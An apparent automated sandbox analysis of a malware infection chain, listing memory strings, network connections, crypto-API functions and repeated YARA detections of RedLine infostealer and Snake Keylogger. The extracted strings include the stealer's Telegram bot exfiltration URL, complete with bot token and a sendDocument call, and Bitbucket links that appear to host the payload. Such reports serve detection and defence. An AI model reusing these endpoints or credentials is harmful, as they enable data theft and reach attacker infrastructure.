              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B591000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032961000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2757842807.0000000022781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: spoolsv.COM, 0000000A.00000002.1613318386.0000000021A10000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1580963085.000000007F11A000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612795563.000000002193C000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, xzeheenC.pif.10.drString found in binary or memory: http://www.pmail.com0
              Source: kn.exeString found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%ws
              Source: kn.exe, 00000007.00000000.1471597989.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1483116865.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1485238233.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1489880503.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr String found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.0000000022A51000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2757842807.0000000022AB8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B8E8000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002B62B000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002B7FD000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002B591000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002B68C000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002BA5F000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002B7A4000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002B623000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032ED4000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032A4D000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2757842807.0000000022B88000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2757842807.00000000229BE000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2757842807.00000000227D8000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2757842807.000000002293F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B61B000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002B8E8000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002B62B000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002B7FD000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002B591000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002B68C000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002BA5F000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002B7A4000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032ED4000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032C31000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032AEA000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032B04000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032A4D000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032A86000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032B61000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032961000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032D67000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032ECC000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2757842807.0000000022781000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2757842807.00000000229ED000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2757842807.0000000022B88000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.000000002293F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.0000000022A51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/both
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.0000000022B88000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.orgL
              Source: spoolsv.COM, 0000000A.00000002.1583110687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
              Source: spoolsv.COM, 0000000A.00000002.1583110687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/e427e629-62a6-4ecd-bf22-56e4d6ea083f/downloads/3fdf6255-c09f-
              Source: spoolsv.COM, 0000000A.00000002.1583110687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbuseruploads.s3.amazonaws.com:443/e427e629-62a6-4ecd-bf22-56e4d6ea083f/downloads/3fdf6255-c
              Source: spoolsv.COM, 0000000A.00000002.1583110687.00000000007B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/
              Source: spoolsv.COM, 0000000A.00000002.1610085610.000000002083D000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/ntim1478/gpmaw/dow
              Source: spoolsv.COM, 0000000A.00000002.1610085610.00000000207CB000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1610085610.00000000207FD000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1583110687.000000000076F000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1583110687.00000000007EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/ntim1478/gpmaw/downloads/202_Cneehezxuzj
              Source: spoolsv.COM, 0000000A.00000002.1583110687.000000000076F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/ntim1478/gpmaw/downloads/202_Cneehezxuzj2_
              Source: kn.exe String found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc
              Source: kn.exe String found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/device/
              Source: kn.exe String found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/key/
              Source: kn.exe String found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorize
              Source: kn.exe, 00000007.00000000.1471597989.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1483116865.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1485238233.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1489880503.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr String found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah
              Source: kn.exe String found in binary or memory: https://login.microsoftonline.com/%s/oauth2/token
              Source: spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612493392.000000002182E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.0000000020883000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1703461302.000000000057C000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1745419099.0000000021300000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sectigo.com/CPS0
              Source: unknown HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.8:49705 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 54.231.224.185:443 -> 192.168.2.8:49706 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49712 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49716 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49720 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49931 version: TLS 1.2
              Source: Yara match File source: Process Memory Space: spoolsv.COM PID: 4896, type: MEMORYSTR

              E-Banking Fraud

              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF792D4B684 CertCompareCertificateName,#357,#357,CertEnumCertificatesInStore,CertCompareCertificateName,CertComparePublicKeyInfo,memcmp,#357,CertEnumCertificatesInStore,#357,CertFreeCertificateContext,CertAddCertificateContextToStore,GetLastError,7_2_00007FF792D4B684
              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF792DC93A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,7_2_00007FF792DC93A0
              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF792D9342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF792D9342C
              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF792DC98B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,7_2_00007FF792DC98B0
              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF792D8184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,7_2_00007FF792D8184C
              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF792D2FC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,7_2_00007FF792D2FC20
              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF792D1F9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,7_2_00007FF792D1F9B8
              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF792D8E1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,7_2_00007FF792D8E1F8
              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF792DCA740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,7_2_00007FF792DCA740
              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF792D525E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,7_2_00007FF792D525E8
              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF792D529A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,7_2_00007FF792D529A0
              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF792D7EA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,7_2_00007FF792D7EA7C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D80F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext,7_2_00007FF792D80F58
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D90EF4 NCryptImportKey,#205,#359,#359,#357,7_2_00007FF792D90EF4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC6EA8 NCryptImportKey,#360,7_2_00007FF792DC6EA8

              System Summary

              Source: 16.2.xzeheenC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 22.2.xzeheenC.pif.33966478.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 22.2.xzeheenC.pif.33966478.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 16.2.xzeheenC.pif.2b37c896.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 16.2.xzeheenC.pif.2b37c896.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 16.2.xzeheenC.pif.2dcd0f08.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 16.2.xzeheenC.pif.2dcd0f08.6.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 26.2.xzeheenC.pif.226c0f08.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 26.2.xzeheenC.pif.226c0f08.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 22.2.xzeheenC.pif.34ca0f08.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 22.2.xzeheenC.pif.34ca0f08.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 16.2.xzeheenC.pif.2dcd0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 16.2.xzeheenC.pif.2dcd0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 22.2.xzeheenC.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 16.3.xzeheenC.pif.2991aba0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 16.3.xzeheenC.pif.2991aba0.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 16.2.xzeheenC.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 16.2.xzeheenC.pif.2c596478.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 16.2.xzeheenC.pif.2c596478.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 26.2.xzeheenC.pif.25170000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 26.2.xzeheenC.pif.25170000.8.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 16.2.xzeheenC.pif.2c5ce790.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 16.2.xzeheenC.pif.2c5ce790.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 26.2.xzeheenC.pif.226c0000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 26.2.xzeheenC.pif.226c0000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 16.2.xzeheenC.pif.2e330000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 16.2.xzeheenC.pif.2e330000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 26.2.xzeheenC.pif.222bb98e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 26.2.xzeheenC.pif.222bb98e.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 22.1.xzeheenC.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 16.2.xzeheenC.pif.2dcd0000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 16.2.xzeheenC.pif.2dcd0000.7.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 22.2.xzeheenC.pif.34ca0000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 22.2.xzeheenC.pif.34ca0000.6.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 22.2.xzeheenC.pif.34d20000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 22.2.xzeheenC.pif.34d20000.8.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 22.2.xzeheenC.pif.3255b98e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 22.2.xzeheenC.pif.3255b98e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 22.2.xzeheenC.pif.3255c896.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 22.2.xzeheenC.pif.3255c896.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 26.2.xzeheenC.pif.222bc896.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 26.2.xzeheenC.pif.222bc896.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 22.2.xzeheenC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 26.2.xzeheenC.pif.222bb98e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 26.2.xzeheenC.pif.222bb98e.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 22.2.xzeheenC.pif.34d20000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 22.2.xzeheenC.pif.34d20000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 22.2.xzeheenC.pif.3399e790.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 22.2.xzeheenC.pif.3399e790.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 26.2.xzeheenC.pif.237be790.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 26.2.xzeheenC.pif.237be790.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 16.2.xzeheenC.pif.2b37c896.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 16.2.xzeheenC.pif.2b37c896.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 16.1.xzeheenC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 16.3.xzeheenC.pif.2991aba0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 16.3.xzeheenC.pif.2991aba0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 26.2.xzeheenC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 26.2.xzeheenC.pif.237be790.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 26.2.xzeheenC.pif.237be790.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 26.3.xzeheenC.pif.2072dd00.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 26.3.xzeheenC.pif.2072dd00.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 18.2.Cneehezx.PIF.21496c78.6.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 22.3.xzeheenC.pif.30aaea30.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 22.3.xzeheenC.pif.30aaea30.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 22.2.xzeheenC.pif.33965570.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 22.2.xzeheenC.pif.33965570.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 16.2.xzeheenC.pif.2c595570.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 16.2.xzeheenC.pif.2c595570.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 26.2.xzeheenC.pif.222bc896.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 26.2.xzeheenC.pif.222bc896.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 16.2.xzeheenC.pif.2c596478.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 16.2.xzeheenC.pif.2c596478.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 26.1.xzeheenC.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 22.1.xzeheenC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 26.1.xzeheenC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 16.2.xzeheenC.pif.2b37b98e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 16.2.xzeheenC.pif.2b37b98e.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 26.2.xzeheenC.pif.23786478.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 26.2.xzeheenC.pif.23786478.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 16.2.xzeheenC.pif.2b37b98e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 16.2.xzeheenC.pif.2b37b98e.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 26.2.xzeheenC.pif.226c0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 26.2.xzeheenC.pif.226c0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 22.2.xzeheenC.pif.3399e790.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 22.2.xzeheenC.pif.3399e790.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 10.2.spoolsv.COM.2193c948.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 26.2.xzeheenC.pif.25170000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 26.2.xzeheenC.pif.25170000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 10.2.spoolsv.COM.219d13d8.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 26.2.xzeheenC.pif.23785570.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 26.2.xzeheenC.pif.23785570.7.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 26.2.xzeheenC.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 22.2.xzeheenC.pif.3255b98e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 22.2.xzeheenC.pif.3255b98e.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 22.2.xzeheenC.pif.34ca0f08.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
